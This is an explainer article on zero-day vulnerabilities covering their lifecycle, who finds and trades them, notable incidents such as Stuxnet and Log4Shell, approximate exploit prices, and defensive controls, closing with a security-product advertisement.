Every time a major cyberattack makes headlines, the word zero-day appears somewhere in the coverage. Zero-day exploits. Zero-day vulnerabilities. Zero-day attacks. The term carries weight — it implies sophistication, inevitability, and the unsettling idea that you can be compromised through a flaw that no defense in the world could have stopped.

That impression is partly accurate and partly misleading. Zero-days are real, they are dangerous, and they are used in some of the most significant attacks on record. But the mythology around them often obscures what they actually are, how they are discovered and deployed, and — most importantly — what you can actually do in the face of them.

The definition — what zero-day actually means

A zero-day vulnerability is a security flaw in software, hardware, or firmware that is unknown to the party responsible for fixing it. The term zero-day refers to the number of days the developer has had to address the issue: zero. They do not know it exists, which means they have had no time to develop a patch, issue an advisory, or warn users.

A zero-day exploit is the attack code or technique that takes advantage of a zero-day vulnerability. A zero-day attack is an actual intrusion carried out using a zero-day exploit.

The critical element that makes a zero-day so dangerous is timing. In normal vulnerability management, a flaw is discovered, reported to the vendor, a patch is developed and released, and users apply the patch. The window of exposure can be days, weeks, or months depending on how quickly each step happens — but it is a window with a beginning and an end. A zero-day has no beginning from the defender's perspective. You are exposed from the moment the flaw is introduced into the software until the moment a patch is available and applied — and you have no way of knowing you are exposed.

A zero-day is not just an unpatched vulnerability. It is a vulnerability for which no patch exists because the developer does not know about it. The distinction matters enormously for how you think about defense.

How the zero-day lifecycle works

THE ZERO-DAY LIFECYCLE
1
Vulnerability introducedA flaw is created — typically during software development. It may exist for months or years before anyone finds it. The developer is unaware.
2
DiscoverySomeone finds the vulnerability. This could be a security researcher, a government intelligence agency, a criminal group, or the software vendor itself. What happens next depends entirely on who finds it.
3
Decision point — disclose or exploitResponsible researchers report the flaw to the vendor (responsible disclosure). Intelligence agencies and criminal groups typically keep it secret and develop exploits. This is where the zero-day market operates.
4
Active exploitation — the true zero-day windowIf the vulnerability is being exploited before the vendor knows about it, this is the true zero-day period. Every system running the vulnerable software is exposed with no available defense.
5
Vendor discovery and patch developmentEventually the vendor learns about the vulnerability — through their own research, a security report, or by detecting active exploitation. Patch development begins. This can take days to months.
6
Patch release and the n-day windowThe patch is released and the vulnerability becomes public. Now it is an n-day — a known vulnerability with a known fix. Organizations that patch quickly reduce their exposure. Those that delay remain vulnerable.
7
Full remediationThe vulnerability is patched across exposed systems. Exploitation drops off as the attack surface shrinks. The zero-day is fully retired — though some organizations may remain vulnerable indefinitely.

Who finds zero-days and what they do with them

The zero-day ecosystem involves a range of actors with very different motivations and very different approaches to what they do with the vulnerabilities they find.

Independent security researchers. Many zero-days are found by security researchers working independently or for security firms. Most follow responsible disclosure practices — reporting directly to the vendor and giving them time to develop a patch before going public. Bug bounty programs from major vendors like Google, Microsoft, and Apple pay researchers for responsible disclosures, creating a financial incentive for the responsible path.

Government intelligence agencies. Nation-state intelligence agencies — the NSA, GCHQ, China's MSS, and equivalents globally — invest heavily in finding and stockpiling zero-days for offensive operations. These are used for espionage, disruption of adversary systems, and in some cases destructive attacks. The most sophisticated zero-days in existence are typically held by nation-states and never disclosed publicly.

The zero-day market. A commercial market exists for zero-day vulnerabilities. Companies like Zerodium and government contractors pay significant sums for high-quality zero-days targeting widely used software. Prices range from tens of thousands to millions of dollars depending on the target software and the reliability of the exploit. A zero-day for a fully updated iPhone has sold for over $2.5 million.

Criminal organizations. Sophisticated ransomware groups and other criminal actors use zero-days, though less commonly than nation-states due to cost. Criminal groups typically buy exploits from the market or from nation-state actors whose zero-days have been exposed through other means.

Notable zero-day attacks

SIGNIFICANT ZERO-DAY INCIDENTS
Stuxnet — 2010
NATION-STATEThe most sophisticated zero-day attack ever publicly documented. Used four separate zero-day vulnerabilities simultaneously to target Iranian nuclear centrifuges. Widely attributed to the US and Israel. Demonstrated that cyberweapons could cause physical destruction.
EternalBlue — 2017
NSA LEAKA zero-day targeting Windows SMB developed by the NSA and stolen by the Shadow Brokers hacking group. Used in the WannaCry ransomware attack that hit 200,000 systems in 150 countries, including the UK's National Health Service. A patch had been released months earlier — most victims had not applied it.
Log4Shell — 2021
CRITICALA zero-day in Log4j, a ubiquitous Java logging library used by millions of applications. CVSS score of 10.0 — the maximum. Exploitable with a single line of text. Affected systems from consumer products to enterprise infrastructure. Considered one of the most serious vulnerabilities ever discovered.
MOVEit — 2023
CRIMINALThe Cl0p ransomware group exploited a zero-day in MOVEit file transfer software, compromising hundreds of organizations before a patch was available. Affected government agencies, universities, and corporations globally. Demonstrated criminal actors' increasing capability to develop and weaponize zero-days.

The zero-day market — what vulnerabilities are worth

ZERO-DAY MARKET PRICES (APPROXIMATE)
$2.5M+
Full iPhone chain — remote code execution with persistence
$1M+
Android full chain — same capability on Android
$500K
Chrome or Safari browser zero-day with sandbox escape
$250K
Windows local privilege escalation
$100K
Microsoft Office remote code execution
$50K
Network device vulnerabilities — routers, firewalls

These prices reflect why zero-days are primarily a nation-state weapon. Most criminal organizations cannot afford to spend $1 million on a single exploit when known vulnerabilities with available patches are routinely left unpatched by their targets. The criminal calculus favors the cheaper option — and the cheaper option works because patching remains a persistent organizational failure.

What you can actually do

Here is the honest answer: if a sophisticated nation-state with a genuine zero-day decides to target your specific organization, there is limited defense available. That is the nature of an unknown, unpatched vulnerability.

But two things make this less alarming than it sounds. First, the vast majority of organizations are never targeted by nation-state actors with zero-days. Second, the controls that limit zero-day impact are largely the same controls that prevent all other attacks — and they work.

HOW TO LIMIT ZERO-DAY EXPOSURE
1
Patch everything else immediatelyMost "zero-day" attacks in practice are attacks on known vulnerabilities that have not been patched. Organizations that patch aggressively remove the low-hanging fruit and force attackers toward more expensive zero-days — which most attackers will not use against you.
2
Reduce attack surfaceThe fewer systems and services exposed to the internet, the fewer zero-days can be used against you. Disable unnecessary services. Enforce network segmentation. Zero-days require access — limit access and you limit the impact of zero-days.
3
Behavioral detection over signature detectionSignature-based antivirus cannot detect zero-days by definition — there is no signature for an unknown attack. Behavioral detection tools watch for anomalous activity regardless of whether the attack technique is known. EDR solutions with behavioral analysis provide meaningful protection against zero-day exploitation.
4
Principle of least privilegeA zero-day that compromises a standard user account is significantly less damaging than one that compromises an administrator. Limiting what accounts can do limits what a zero-day can accomplish through those accounts.
5
Network segmentationEven if a zero-day compromises one system, network segmentation limits lateral movement. An attacker who gains access to a workstation in a well-segmented network cannot automatically reach the domain controller, the backup system, or the financial data.
6
Monitor for anomalous behaviorA zero-day exploit that successfully runs will generate some behavioral signal — unusual process execution, unexpected network connections, anomalous authentication activity. Security monitoring that looks for behavioral anomalies rather than known signatures can detect zero-day exploitation after the fact, enabling faster response.

"Defending against zero-days is not about stopping the initial exploit — it is about limiting what an attacker can do after they get in. Assume breach. Build your defenses around that assumption."

Zero-days and the intel feed

When you see a zero-day reported on intel.mycyberbrief.com, the coverage will typically include the CVE identifier if one has been assigned, the affected software and versions, whether active exploitation has been confirmed, and whether a patch is available.

The most important signal in any zero-day report is whether exploitation is confirmed in the wild. A zero-day that is theoretical or limited to targeted attacks against specific high-value targets requires a different response than a zero-day being mass-exploited by criminal groups. The threat level, the urgency of response, and the actions you need to take differ significantly based on this distinction.

CISA's Known Exploited Vulnerabilities catalog is the authoritative source for vulnerabilities with confirmed active exploitation. When a zero-day is added to this catalog, it carries a remediation deadline for federal agencies and serves as a strong signal for all organizations about which vulnerabilities require urgent attention.

MB
Malwarebytes
Behavioral detection that catches zero-day exploitation attempts — not just known malware signatures. Consumer and business plans available.
GET 50% OFF →